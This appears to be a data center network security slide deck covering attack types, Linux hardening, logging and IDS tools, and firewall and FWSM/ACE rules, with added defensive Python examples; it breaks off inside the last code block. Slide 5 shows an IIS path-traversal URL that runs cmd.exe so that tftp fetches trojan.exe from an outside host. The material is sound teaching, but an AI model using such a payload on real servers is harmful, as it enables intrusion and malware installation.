
Data Center Network Security




  1. Data Center Network Security

  2. History • Old days – security = planting two firewalls • Today – security = very complex problem

  3. Type of attacks • Attacks on networks have become more sophisticated and are carried out through, among others, the following techniques: • Packet sniffing— An application that uses the promiscuous mode of the network adapter to capture all network packets. • IP spoofing— An attack in which a hacker assumes another host's IP address to conceal their true identity • Denial-of-service (DoS) attack— Aims to overwhelm a service so as to deny legitimate requests from being serviced. The exhausted resource may be bandwidth, memory, or CPU. It is the most well-known of all Internet attacks, and effort should be invested in understanding its mechanisms. Some of the more famous DoS attacks include the following: • Code Red • Blaster • Ping of Death • Trinity

  4. Type of attacks • Password attack— As its name implies, this attack intends to acquire passwords to important assets so as to cause further damage. Password attacks can be achieved through other methods previously mentioned, such as IP spoofing, or they can be achieved via brute force • Man-in-the-middle attack— This type of attack happens when a hacker manages to position himself between the source and the destination of a network transaction. ARP cache poisoning is one common method • Application attack— This type of attack happens when holes in application software are exploited to gain access to a computer system. The holes may be software bugs or unnecessarily exposed TCP ports • Port redirection attack— This type of attack makes use of a compromised host to gain access to a network that is otherwise protected

  5. Typical Intrusion Sequence—Hacking the Web/Application Server • After a phase of probing/scanning, the hacker detects a vulnerability of the web/application server • The hacker exploits the vulnerability to get a shell • For example: • Copy the Trojan onto the web/application server: • HTTPS://www.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe

  6. Automated Intrusion Sequence—Blaster Ex.

  7. Attack Patterns

  8. Server Farm Security Strategies

  9. Segmenting the Server Farm

  10. Building the Firewall Ruleset

  11. From Physical Separation to Logical Separation

  12. Avoid Break-ins in Linux • To save on system resources and make system administration less complex, many services are handled through the configuration file /etc/inetd.conf. This file tells the system how to run each of the available services. • Many Linux vendors turn on various services in inetd.conf by default, when for maximum security they should be off! • In many corporate environments security as such is not an issue: if there is enough security to prevent accidental damage in these 'soft' environments, providing access to these services matters more than blocking them.

  13. Avoid Break-ins in Linux • If your Linux host is exposed to the Internet you may hold a different point of view though. To check what services are currently running on your Linux system, type the command • netstat -vat • This will print something like this:
    tcp 0 0 *:6000 *:* LISTEN
    tcp 0 0 *:www *:* LISTEN
    tcp 0 0 *:auth *:* LISTEN
    tcp 0 0 *:finger *:* LISTEN
    tcp 0 0 *:shell *:* LISTEN
    tcp 0 0 *:sunrpc *:* LISTEN
  • Each line that says LISTEN is a service waiting for connections.

  14. Avoid Break-ins in Linux • Some of these services run as stand-alone programs, but many of them are controlled by /etc/inetd.conf. If you are not sure what a service does, look it up in /etc/inetd.conf. For instance, if you type
    grep '^finger' /etc/inetd.conf
  you will get back a line from inetd.conf like this:
    finger stream tcp nowait nobody /usr/sbin/tcpd /usr/sbin/in.fingerd

  15. Avoid Break-ins in Linux • To see what the program does, look up in.fingerd in the man pages. • If you think you can live without this service, then it can be turned off in /etc/inetd.conf. • By commenting out the line (put a # at the start of the line) and then issuing the command killall -HUP inetd you can immediately and permanently turn a service off. There is no need to reboot.

  16. Avoid Break-ins in Linux • If a service is not listed in /etc/inetd.conf then it probably runs as a stand-alone program. • You can remove a service provided by a stand-alone background program by uninstalling its package. Only do this if you are sure about what the program does and are certain that it is not necessary.
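  The procedure on slides 13 to 16 (list what is listening, look each service up in /etc/inetd.conf, comment out what you do not need) is easy to script. The following Python is an added example written for this transcript, not code from the slides; it works on a constructed netstat -vat listing and a constructed inetd.conf embedded inline, and the function names and the `keep` allowlist are my own choices.

```python
# Constructed sample netstat -vat output, modelled on the listing shown on slide 13.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:6000                  *:*                     LISTEN
tcp        0      0 *:www                   *:*                     LISTEN
tcp        0      0 *:auth                  *:*                     LISTEN
tcp        0      0 *:finger                *:*                     LISTEN
tcp        0      0 *:shell                 *:*                     LISTEN
tcp        0      0 *:sunrpc                *:*                     LISTEN
tcp        0      0 host.example:www        client.example:34512    ESTABLISHED
"""

# Constructed sample /etc/inetd.conf in the classic seven-field format.
SAMPLE_INETD_CONF = """\
# /etc/inetd.conf: see inetd(8) for further information.
#<service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  /usr/sbin/in.ftpd
#telnet stream  tcp     nowait  root    /usr/sbin/tcpd  /usr/sbin/in.telnetd
finger  stream  tcp     nowait  nobody  /usr/sbin/tcpd  /usr/sbin/in.fingerd
shell   stream  tcp     nowait  root    /usr/sbin/tcpd  /usr/sbin/in.rshd
auth    stream  tcp     nowait  nobody  /usr/sbin/in.identd in.identd -l -e -o
"""

SOCKET_TYPES = {"stream", "dgram", "raw", "rdm", "seqpacket"}


def listening_services(netstat_output):
    """Return the local service names (or port numbers) of TCP sockets in LISTEN state."""
    services = []
    for line in netstat_output.splitlines():
        fields = line.split()
        if len(fields) >= 6 and fields[0].startswith("tcp") and fields[-1] == "LISTEN":
            # Local Address is written as address:service; keep the part after the last colon.
            services.append(fields[3].rsplit(":", 1)[1])
    return services


def parse_inetd(conf_text):
    """Map each service entry in inetd.conf to its server program and enabled state.

    A commented-out entry (leading '#') is still parsed, but marked disabled."""
    entries = {}
    for line in conf_text.splitlines():
        stripped = line.strip()
        enabled = not stripped.startswith("#")
        fields = stripped.lstrip("#").split()
        # A real entry has at least service, socket type, protocol, flags, user and server path.
        if len(fields) < 6 or fields[1] not in SOCKET_TYPES:
            continue
        # When the server path is the tcpd wrapper, the real program is the next field.
        program = fields[6] if fields[5].endswith("/tcpd") and len(fields) > 6 else fields[5]
        entries[fields[0]] = {"enabled": enabled, "program": program}
    return entries


def classify_listeners(netstat_output, conf_text):
    """Say for each listening service whether inetd starts it or it runs stand-alone."""
    entries = parse_inetd(conf_text)
    result = {}
    for svc in listening_services(netstat_output):
        if svc in entries and entries[svc]["enabled"]:
            result[svc] = "inetd:" + entries[svc]["program"]
        else:
            result[svc] = "standalone"
    return result


def disable_services(conf_text, keep):
    """Return (new_text, disabled): inetd.conf with every enabled service not in `keep`
    commented out, which is what the slide suggests doing by hand."""
    entries = parse_inetd(conf_text)
    out, disabled = [], []
    for line in conf_text.splitlines():
        fields = line.split()
        name = fields[0] if fields else ""
        if name in entries and entries[name]["enabled"] and name not in keep:
            out.append("#" + line)
            disabled.append(name)
        else:
            out.append(line)
    return "\n".join(out) + "\n", disabled


if __name__ == "__main__":
    for svc, origin in classify_listeners(SAMPLE_NETSTAT, SAMPLE_INETD_CONF).items():
        print(f"{svc:8s} {origin}")
    hardened, gone = disable_services(SAMPLE_INETD_CONF, keep={"ftp"})
    print("disabled:", ", ".join(gone))
    print(hardened)
```

  Services that netstat reports but inetd.conf does not know (6000, www, sunrpc in the sample) are the stand-alone daemons slide 16 talks about; they are removed by uninstalling their packages, not by editing this file. After writing the hardened file to /etc/inetd.conf, the killall -HUP inetd from slide 15 makes inetd reread it.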

  17. SSH • To add extra security to the various services, Linux has a system for allowing and denying them to chosen hosts. For instance, you may wish to allow logins from machines at your own site, but not from the Internet. The files /etc/hosts.allow and /etc/hosts.deny list allowed services and hosts.

  18. SSH • The method of denying connections by checking the host provides a good basic method for throwing off attacks. • It is not the end of the story. • It is possible to fake host names on incoming connections ( oh yes it is ). • While data is in transit between programs over the Internet it is also in danger. Anyone with the knowledge can look at your data. Using a method known as 'spoofing' they can even inject fake data into a legitimate stream. • These problems come about because of the way that Internet protocols interact. To overcome these difficulties ssh was devised.

  19. SSH • Ssh is a stable, well-developed, open-source system that provides encryption and authentication on connections. • Encryption uses codes to protect the packets of data while in transit. • Authentication is a process for verifying whether a packet of data or a connection is valid. • There are ssh clients for most other operating systems too. • By using Linux as a server you can provide ssh-level security for all your network use.

  20. Logging • Linux has a comprehensive set of subsystems to let the systems administrator know what is going on with his or her system. • All manner of log files are generally kept in the /var/log directory. • Most of the standard services log information to /var/log/syslog and /var/log/messages about users connecting to them or attempting to connect. • There are also log files for such services as apache (/var/log/httpd/access_log), mail (/var/log/mail) and firewall (/var/log/firewall).

  21. Logging • The main problem with logging events is that one tends to end up with too much data. • Careful filtering and only logging important information is important.

  22. Logging • There are some good tools out there that will make this work easier. • Ethereal (now Wireshark) is a packet sniffer. • With it you can capture various types of packets over a given period of time. • It also shows all manner of information about the packets. • It's useful for watching packets coming into and going out of your machine. • Generally it will detect traffic on your network segment.

  23. Logging • Another logging/intrusion detection type tool is called Tripwire. • It takes a snapshot of your important system files and records their signature in a database. • Various signature levels are available from mild to wild. • You can also set the rules in a policy file to tell Tripwire what to check. • After the database is initialized and signed Tripwire can be executed whenever you need to check the integrity of your system. • The report will point out when your files are changed and the severity of the security risk. The Tripwire report is pretty easy to read and can be customized according to your file tracking needs.
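  To make the Tripwire idea concrete (snapshot important files into a signed database, define severity in a policy, then compare), here is an added example in Python. It is not Tripwire's code or its database format; it builds a constructed file tree in a temporary directory, signs the baseline with an HMAC under an assumed key, simulates a replaced binary plus a new file, and reports each difference with a severity taken from a constructed policy list.

```python
import hashlib
import hmac
import json
import os
import tempfile

# Constructed policy: path prefix -> severity of a change there (Tripwire uses a policy file).
POLICY = [("bin/", "high"), ("etc/", "high"), ("var/log/", "low")]


def fingerprint(path):
    """Hash a file and record the metadata a rootkit replacement would alter."""
    st = os.stat(path)
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return {"sha256": digest.hexdigest(), "size": st.st_size, "mode": st.st_mode & 0o7777}


def snapshot(root):
    """Walk `root` and fingerprint every regular file, keyed by relative path."""
    db = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            db[os.path.relpath(full, root)] = fingerprint(full)
    return db


def sign_database(db, key):
    """Serialise the baseline and attach an HMAC so a tampered database is rejected."""
    payload = json.dumps(db, sort_keys=True)
    mac = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return {"payload": payload, "mac": mac}


def load_signed_database(signed, key):
    """Verify the HMAC before trusting the baseline; raise ValueError on mismatch."""
    expected = hmac.new(key, signed["payload"].encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, signed["mac"]):
        raise ValueError("integrity database signature mismatch")
    return json.loads(signed["payload"])


def database_is_valid(signed, key):
    try:
        load_signed_database(signed, key)
        return True
    except ValueError:
        return False


def severity(relpath):
    for prefix, level in POLICY:
        if relpath.startswith(prefix):
            return level
    return "medium"


def check(baseline, current):
    """Compare two snapshots; return sorted (path, kind, severity) for every difference."""
    report = []
    for path in sorted(set(baseline) | set(current)):
        if path not in current:
            kind = "removed"
        elif path not in baseline:
            kind = "added"
        elif baseline[path] != current[path]:
            kind = "changed"
        else:
            continue
        report.append((path, kind, severity(path)))
    return report


def demo():
    """Build a constructed file tree, baseline it, tamper with it, and return the report."""
    key = b"constructed-demo-key"  # in practice a secret kept off the monitored host
    with tempfile.TemporaryDirectory() as root:
        files = {"bin/ls": b"original binary",
                 "etc/passwd": b"root:x:0:0:root:/root:/bin/sh\n",
                 "var/log/messages": b"Mar 12 02:14:01 gw sshd[2021]: ...\n"}
        for rel, data in files.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(data)
        signed = sign_database(snapshot(root), key)
        # Simulated intrusion: a replaced binary, an unexpected new file, and routine log growth.
        with open(os.path.join(root, "bin/ls"), "wb") as fh:
            fh.write(b"replaced binary")
        with open(os.path.join(root, "bin/newtool"), "wb") as fh:
            fh.write(b"unexpected")
        with open(os.path.join(root, "var/log/messages"), "ab") as fh:
            fh.write(b"Mar 12 02:14:03 gw sshd[2021]: ...\n")
        return check(load_signed_database(signed, key), snapshot(root))


if __name__ == "__main__":
    for path, kind, level in demo():
        print(f"{level:6s} {kind:8s} {path}")
```

  The signed baseline is the point: an intruder who has root can rewrite any file, so the database must be something they cannot silently rewrite (Tripwire signs it for the same reason). The log file shows up as a low-severity change because logs are expected to grow; the policy is what keeps that noise out of the way of the high-severity binary replacement.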

  24. Logging • A popular program for detecting access attempts (via the network) and port scans is Snort. • The program produces files that log these types of activities and even gives some idea of where to find out more information. • The same problem as with other log files. It gets tough for a busy system administrator to review all the log files on a regular basis

  25. Firewalls • A firewall is a device that protects a private network from the wider Internet. • The simplest form of firewall is a Linux machine with one network connection ( an Ethernet card or modem ) connected to the Internet and the other connected to the private network. • The firewall computer can reach the protected network and the Internet. • The traffic between the protected network and the Internet is controlled, in both directions, by a list of rules. • These rules can be customized for your needs. • CoyoteLinux.com has a firewall system that fits on a floppy and doesn't need a hard disk to run. It's designed specifically to address the need for an easy-to-install, no-nonsense Linux firewall

  26. Firewalls • All data flowing between the Internet and the private network is filtered by the firewall. • Inside the private network less care needs to be taken with turning off services and the like. • It is a way of concentrating effort on making one machine secure and protecting many others in the process. • The methods for correctly setting up firewalls are quite complex. • First you have to configure your machine for two Ethernet cards. • Then you have to use the ipchains/iptables software to set up filters that control what passes between the two Ethernet cards.

  27. Firewalls • The main drawback with making your systems more secure is that they become less accessible. • The idea behind ramping up your system's security is to stop use of your computers by crooks, thieves and malcontents but let the legitimate users use the system

  28. Tools • Tools for defense can be grouped into four categories: • log monitoring • connection monitoring • host based intrusion detection • network based intrusion detection

  29. Log Monitoring • These tools will watch over your log files and help you detect security related events (actually, based on the rules, you can have them detect any type of event). Either by default, or through configuration, they can e-mail you the alerts. • autobuse • logcheck • Logwatch • swatch
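  Slide 21 says the real problem with logging is too much data, and slide 29 lists tools (logcheck, swatch and the like) that reduce it to rule-matched alerts. The Python below is an added example of that rule-based reduction, not code from any of the listed tools: it runs ignore rules and watch rules over constructed /var/log/messages-style lines, counts authentication failures per source, and raises one alert per source above a threshold instead of one line per attempt. The sample lines, rule patterns and the threshold are all constructed for the example.

```python
import re
from collections import Counter

# Constructed sample lines in /var/log/messages style (not real logs).
SAMPLE_LOG = """\
Mar 12 02:14:01 gw sshd[2021]: Failed password for invalid user admin from 203.0.113.7 port 40122 ssh2
Mar 12 02:14:03 gw sshd[2021]: Failed password for invalid user admin from 203.0.113.7 port 40123 ssh2
Mar 12 02:14:05 gw sshd[2021]: Failed password for root from 203.0.113.7 port 40124 ssh2
Mar 12 02:14:06 gw CRON[2040]: (root) CMD (run-parts /etc/cron.hourly)
Mar 12 02:14:09 gw sshd[2051]: Accepted publickey for alice from 192.0.2.10 port 51000 ssh2
Mar 12 02:14:12 gw in.fingerd[2060]: connect from 203.0.113.7
Mar 12 02:14:15 gw sshd[2021]: Failed password for root from 203.0.113.7 port 40125 ssh2
Mar 12 02:14:20 gw sshd[2021]: Failed password for root from 198.51.100.2 port 55010 ssh2
Mar 12 02:14:22 gw kernel: eth0: link up, 100Mbps, full-duplex
"""

# Noise we never want to see (logcheck-style ignore rules).
IGNORE_RULES = [
    re.compile(r"CRON\[\d+\]: \(\w+\) CMD "),
]

# Events worth reporting: (label, pattern). Each pattern captures the remote host as "src".
WATCH_RULES = [
    ("ssh-auth-failure", re.compile(
        r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)")),
    ("ssh-login", re.compile(r"sshd\[\d+\]: Accepted \S+ for (?P<user>\S+) from (?P<src>\S+)")),
    ("finger-probe", re.compile(r"in\.fingerd\[\d+\]: connect from (?P<src>\S+)")),
]


def filter_log(text, threshold=3):
    """Reduce raw log lines to tagged events and per-source alerts.

    Returns a dict with:
      events    - list of (label, src, user) for lines matching a WATCH rule
      alerts    - {src: failure_count} for sources with >= threshold auth failures
      ignored   - number of lines dropped by IGNORE rules
      unmatched - number of lines matching no rule (candidates for new rules)
    """
    events, ignored, unmatched = [], 0, 0
    failures = Counter()
    for line in text.splitlines():
        if any(rule.search(line) for rule in IGNORE_RULES):
            ignored += 1
            continue
        for label, pattern in WATCH_RULES:
            m = pattern.search(line)
            if m:
                src = m.group("src")
                events.append((label, src, m.groupdict().get("user")))
                if label == "ssh-auth-failure":
                    failures[src] += 1
                break
        else:
            unmatched += 1
    alerts = {src: n for src, n in failures.items() if n >= threshold}
    return {"events": events, "alerts": alerts, "ignored": ignored, "unmatched": unmatched}


if __name__ == "__main__":
    summary = filter_log(SAMPLE_LOG)
    for src, count in summary["alerts"].items():
        print(f"ALERT: {count} ssh authentication failures from {src}")
    print(f"{len(summary['events'])} events, {summary['ignored']} ignored, "
          f"{summary['unmatched']} unmatched")
```

  The unmatched counter is the maintenance hook: lines that match neither list are exactly the ones to review when tuning rules, which is how these tools keep the volume down without silently dropping something new.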

  30. Connection Monitoring • When connected to the internet, unless a firewall is in place, other systems can connect to yours. These tools will help you know who is connecting to your box, even to the point of detecting stealth scans that normal logging will not catch. • ippl • jail • klaxon • portsentry • tcplogd

  31. Host based intrusion detection • These days, it's often difficult to know if an intrusion has taken place. Upon successfully gaining root privilege, an intruder will often erase the logs of the break-in. Quite often, they will take an additional step of installing a set of trojan binaries known as a rootkit. These tools help to detect the intrusion, sometimes even after the intruder has gained root access. • hostsentry • Tripwire • ViperDB

  32. Network based intrusion detection • These tools will help detect intrusions (or intrusion attempts) across your entire network, not just on individual hosts. They will look at the traffic and attempt to match known attack patterns and notify you if an attack is seen. • Network Flight Recorder • SHADOW • snort

  33. Linux Firewalls • Linux Firewalls • * Define a Network Security Policy • * Use a Secure Linux Distro for your firewall • * Harden your firewall • o Install the minimum number of packages • o Turn all unused services off • o Disallow user logins • * Define a set of Firewall Rules • * Define egress and ingress filters • * You'll probably need IP masquerading or NAT • o Allows internal machines to get out on the net • o Outside world sees these internal machines as www.foo.com • * Start with existing/proven/simple Example Firewall configurations • * Test your Firewall from the inside and outside • o Apply all known Exploits and vulnerabilities • o Apply all known Hacking Tools and attacks • o Apply all known Rootkits • Installing a Firewall does NOT solve the "security" problem

  34. Linux Firewall Rules • Firewall Rules • SecurityFocus.net • Example Firewall Scripts • Linux-Sec.net/FW/Scripts Example Firewall Scripts • General Firewall Rules • * Turn on ingress and egress Rules • * Turn on/off various /proc options • * Outgoing Rules • Allow all internal PCs to freely access the Internet • * Incoming Rules • Allow incoming DNS requests to the DNS server • Allow incoming SMTP requests to the mail server • Allow incoming HTTP requests to the web server • Allow incoming FTP requests to the ftp server • Allow incoming ssh requests to the ssh server • Allow incoming wireless requests to the wireless gw server • Allow incoming ppp requests to the ppp gw server • Allow incoming secure pop3/imap requests to the secure pop server • Allow incoming authenticated vpn requests to the vpn server • Disallow messenger.msn.com • Disallow oscar.aol.com • Disallow messenger.yahoo.com (IIRC)

  35. Linux Firewall Rules • NAT Rules • IP Masquerade • E-InfoMax.com IPMasquerade • IPMasq.cjb.net IP_Masquerade-HOWTO • LinuxDoc.org IP_Masquerade-HOWTO • CSUChico.edu • 3-line IP Masquerade • LinuxDoc.org
    ipchains -P forward DENY
    ipchains -A forward -i ppp0 -j MASQ
    echo 1 > /proc/sys/net/ipv4/ip_forward
  • Egress and Ingress Filtering • * Ingress Filtering: incoming network traffic entering your LAN • IETF.org RFC2827.txt • Sans.org Packet_filter - ingress/egress • Sans.org Firewall Issues • * Egress Filtering: outgoing network traffic leaving your LAN • Sans.org Top Ten Blocking Recommendations Using IPChains • Sans.org ipchains Egress Rules • Sans.org Egress Filtering - cisco • Sans.org Egress Filtering ( same as above ) • Incidents.org Egress - cisco
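  The ingress/egress idea from slide 35 and the incoming/outgoing service rules from slide 34 fit in a small rule evaluator, so here is one as an added example (Python, not ipchains syntax and not from the slides). It assumes one LAN of 192.168.1.0/24 behind external interface ppp0, constructed server addresses for the DNS, mail, web and ssh rules, and the RFC 2827 ordering: anti-spoofing checks run before any service rule. The messenger hosts on the block list are the ones slide 34 names.

```python
import ipaddress

# Assumed topology for the example: one LAN behind the firewall, external interface ppp0.
INTERNAL_NETS = [ipaddress.ip_network("192.168.1.0/24")]
EXTERNAL_IF = "ppp0"
# Source ranges that must never arrive from the Internet (RFC 2827 ingress filtering).
BOGON_SOURCES = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "0.0.0.0/8")]
# Constructed server addresses for the inbound service rules listed on slide 34.
SERVERS = {"dns": "192.168.1.53", "mail": "192.168.1.25", "web": "192.168.1.80", "ssh": "192.168.1.22"}
INBOUND_SERVICES = {  # (proto, dport) -> the only host allowed to receive it
    ("udp", 53): SERVERS["dns"], ("tcp", 53): SERVERS["dns"],
    ("tcp", 25): SERVERS["mail"], ("tcp", 80): SERVERS["web"], ("tcp", 22): SERVERS["ssh"],
}
BLOCKED_DESTS = {"messenger.msn.com", "oscar.aol.com", "messenger.yahoo.com"}


def in_any(addr, nets):
    return any(addr in net for net in nets)


def filter_packet(iface, direction, src, dst, proto, dport, dst_name=None):
    """Return (verdict, reason) for one packet seen on `iface` going "in" or "out".

    Evaluated before masquerading rewrites the source, as the ipchains forward chain
    sees it. Order matters: anti-spoofing rules run before service rules."""
    src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    if iface == EXTERNAL_IF and direction == "in":
        if in_any(src_ip, INTERNAL_NETS) or in_any(src_ip, BOGON_SOURCES):
            return "DROP", "ingress: spoofed or private source address from the Internet"
        allowed_host = INBOUND_SERVICES.get((proto, dport))
        if allowed_host is not None and dst_ip == ipaddress.ip_address(allowed_host):
            return "ACCEPT", f"inbound {proto}/{dport} to designated server"
        return "DROP", "inbound: no service rule matches"
    if iface == EXTERNAL_IF and direction == "out":
        if not in_any(src_ip, INTERNAL_NETS):
            return "DROP", "egress: source address is not one of ours"
        if dst_name in BLOCKED_DESTS:
            return "DROP", f"egress: {dst_name} is on the block list"
        return "ACCEPT", "outbound from internal host"
    return "ACCEPT", "internal interface traffic"


if __name__ == "__main__":
    # Constructed packets: a web request, a spoofed inbound packet, a leaking outbound one.
    for pkt in [("ppp0", "in", "203.0.113.9", "192.168.1.80", "tcp", 80),
                ("ppp0", "in", "192.168.1.5", "192.168.1.80", "tcp", 80),
                ("ppp0", "out", "203.0.113.77", "198.51.100.1", "udp", 53)]:
        print(pkt[:4], *filter_packet(*pkt))
```

  The egress rule is the one most sites skip: it does not protect you directly, but it stops your hosts from taking part in the spoofed-source DoS attacks from slide 3, and it is the first thing that fires when a compromised internal host starts sending packets with forged addresses.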

  36. Linux Firewall Rules • Cisco ACLs • Firewalls/HowTo/#Cisco Cisco ACLs • Proxy Server Rules • HiSecure Proxy(?) • tcpr ftp and telnet forwarder • COAST udprelay • Dec.com XForward • ReDir port redirector • Reverse Pimpage Revision remotely access machines behind a firewall • Reverse Utilities telnet/http/ssh access to machines behind a firewall • * Sock5 • SourceForge.net Tsocks • SourceForge.net socksd • inet.no • inet.no dante • Umich.edu nylon • SolSoft NSM proxy-based firewall • httpf filters out java, js, etc • tproxy • Squid-Cache.org • * TIS Proxy Server

  37. Data Center Firewalls • FWSM • Protocol support • Syslog • Management tools • DoS protection

  38. ACE • ACE = Application control engine • provides application and network operations management with new levels of control over the way they deploy, operate, deliver, secure and manage their applications and business services across the extended enterprise. It helps enable greater control over the application infrastructure, allowing organizations to quickly deploy and migrate applications, delivering the highest levels of services to the end user while simplifying the overall management and operation of a data center.

  39. FWSM • FWSM = Firewall Service Module

  40. MARS • MARS = Monitoring, Analysis and Response System

  41. Data Center Firewalls • ACE • Integrated SLB and SSL • High capacity • Failover group per context • Failover tracking by HSRP, interface, IP address • Autostate aware • Role based access control • Configuration rollback marking • Bridge-mode: interface pairs per context • Advanced http inspection: mime/regex

  42. ACE—FWSM Security Comparison • Access Lists • Inspection Engines • Timeouts • Private VLANs • Role Based Access Control • Failover • Resource Allocation • Configuration Rollback • VLAN Assignments

  43. Stateful ACLs—Bridge Mode Context
  FWSM 3.1:
    firewall transparent
    access-list BPDU ethertype permit bpdu
    access-list blue extended permit ip any any
    interface Vlan104
     nameif outside
     bridge-group 1
     security-level 0
    interface Vlan40
     nameif inside
     bridge-group 1
     security-level 100
    interface BVI1
     ip address 12.20.40.4 255.255.255.0 standby 12.20.40.5
    access-group BPDU in interface outside
    access-group blue in interface outside
    access-group BPDU in interface inside
    access-group blue in interface inside
    route outside 0.0.0.0 0.0.0.0 12.20.40.1 1
  ACE (note: ACE logging is Phase 2):
    access-list BPDU ethertype permit bpdu
    access-list blue extended permit ip any any
    interface vlan 104
     bridge-group 1
     access-group input BPDU
     access-group input blue
     no shutdown
    interface vlan 204
     bridge-group 1
     access-group input BPDU
     access-group input blue
     no shutdown
    interface bvi 1
     ip address 12.20.40.6 255.255.255.0
     alias 12.20.40.8 255.255.255.0
     peer ip address 12.20.40.7 255.255.255.0
     no shutdown
    ip route 0.0.0.0 0.0.0.0 12.20.40.1

  44. Inspection Compared

  45. HTTP Inspection
  • RFC 2616 compliance and filtering
    • Protocol conformance: the first line of a request is "Method SP" and that of a response is "HTTP-Version SP", etc.
    • De-obfuscation: defeats attempts to evade regex searches by encoding the URL
    • Methods: OPTIONS, GET, POST, HEAD, PUT, DELETE, TRACE, CONNECT
    • Extensions: INDEX, MOVE, MKDIR, COPY, EDIT, UNEDIT, SAVE, LOCK, NLOCK, REVLABEL, REVLOG, REVNUM, SETATTRIBUTE, GETATTRIBUTE, GETATTRIBUTENAMES, GETPROPERTIES, STARTREV, STOPREV
  • Length and encoding checks
    • Length: configurable range for URL and URL header requests and responses
    • Encoding: chunked | compress | deflate | gzip | identity
  • Detect HTTP misuse
    • Peer-to-peer (p2p) applications: Kazaa, Gnutella
    • Tunneling applications: HTTPort/HTTHost, FireThru
    • Instant messaging: (IMI—YAHOO Messenger)
  • MIME type validation and filtering (ACE only)
    • Audio: /*, /midi, /basic, /mpeg, /x-adpcm, /x-aiff, /x-ogg, x-wav (8)
    • Image: /*, /cgf, /gif, /jpeg, /png, /tiff, /x-3ds, /x-bitmap, /x-niff, /x-portable, /x-xpm (11)
    • Text: /*, /css, /html, /plain, /richtext, /sgml, /xmcd, /xml (8)
    • Video: /*, /-flc, /mpeg, /quicktime, /sgi, /x-avi, /x-fli, /x-mng, /x-msvideo (9)
    • Application: /msword, /octet-stream, /pdf, /postscript, /vnd.ms-excel, /vnd.ms-powerpoint, /x-gzip, /x-java-archive, /x-java-vm, /zip (10)
  • Regex filtering on HTTP messages (ACE only)
    • Detect a protocol running on top of HTTP, e.g., to detect Yahoo Messenger, look for YMSG in the first 4 bytes

  46. HTTP Inspection Ex.—Allow Only GETs
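  What the inspection engine on slide 45 checks, and the "allow only GETs" policy of slide 46, can be shown end to end in a few dozen lines. The Python below is an added example written for this transcript; it is not ACE or FWSM code and does not reproduce their configuration. It checks the request line against the RFC 2616 shape, enforces a method allowlist, de-obfuscates the URL (percent decoding, double encoding, and the overlong UTF-8 trick from the slide 5 URL, where %c0%af is an illegal encoding of "/"), validates Transfer-Encoding/Content-Encoding against the five listed tokens, and looks for YMSG in the first bytes of the body. MAX_URL_LENGTH, the function names and the sample requests are constructed for the example.

```python
import re
from urllib.parse import unquote_to_bytes

RFC2616_METHODS = {"OPTIONS", "GET", "POST", "HEAD", "PUT", "DELETE", "TRACE", "CONNECT"}
REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/\d\.\d$")  # Method SP Request-URI SP HTTP-Version
MAX_URL_LENGTH = 1024                                           # assumed limit for the example
ALLOWED_ENCODINGS = {b"chunked", b"compress", b"deflate", b"gzip", b"identity"}
# Application signature in the first bytes of the body; the slide names YMSG for Yahoo Messenger.
TUNNEL_SIGNATURES = {b"YMSG": "yahoo-messenger"}


def lenient_decode(raw):
    """Decode UTF-8, but also map overlong two-byte sequences (lead byte C0/C1, which strict
    decoders reject) to the ASCII character they encode, e.g. C0 AF -> '/'. This is the
    de-obfuscation step: the URL is judged in the form a lenient server would see."""
    out = bytearray()
    i = 0
    while i < len(raw):
        lead = raw[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(((lead & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(lead)
            i += 1
    return bytes(out).decode("utf-8", "replace")


def canonical_url(url):
    """Percent-decode the URL; return (canonical_text, findings), where findings lists the
    obfuscation tricks that had to be undone and any traversal found afterwards."""
    findings = []
    raw = unquote_to_bytes(url)
    if b"\xc0" in raw or b"\xc1" in raw:
        findings.append("overlong-utf8")
    if unquote_to_bytes(raw) != raw:  # decoding a second time still changes it
        findings.append("double-encoding")
    text = lenient_decode(raw).replace("\\", "/")
    if ".." in text.split("?", 1)[0].split("/"):
        findings.append("path-traversal")
    return text, findings


def inspect_request(raw, allowed_methods=frozenset({"GET"})):
    """Return the list of policy violations for one raw HTTP request (empty means it passes)."""
    violations = []
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        return ["malformed-request-line"]
    method, url = m.group(1).decode("ascii"), m.group(2)
    if method not in RFC2616_METHODS:
        violations.append("unknown-method:" + method)
    elif method not in allowed_methods:
        violations.append("method-not-allowed:" + method)
    if len(url) > MAX_URL_LENGTH:
        violations.append("url-too-long")
    violations.extend(canonical_url(url)[1])
    for header in lines[1:]:
        name, _, value = header.partition(b":")
        if name.strip().lower() in (b"transfer-encoding", b"content-encoding"):
            for enc in value.split(b","):
                enc = enc.strip().lower()
                if enc not in ALLOWED_ENCODINGS:
                    violations.append("bad-encoding:" + enc.decode("ascii", "replace"))
    for sig, app in TUNNEL_SIGNATURES.items():
        if body.startswith(sig):
            violations.append("tunnel:" + app)
    return violations


# Constructed sample requests; TRAVERSAL rebuilds the overlong-UTF-8 URL shape from slide 5.
GOOD = b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
POST = b"POST /login HTTP/1.1\r\nHost: www.example.com\r\nContent-Length: 0\r\n\r\n"
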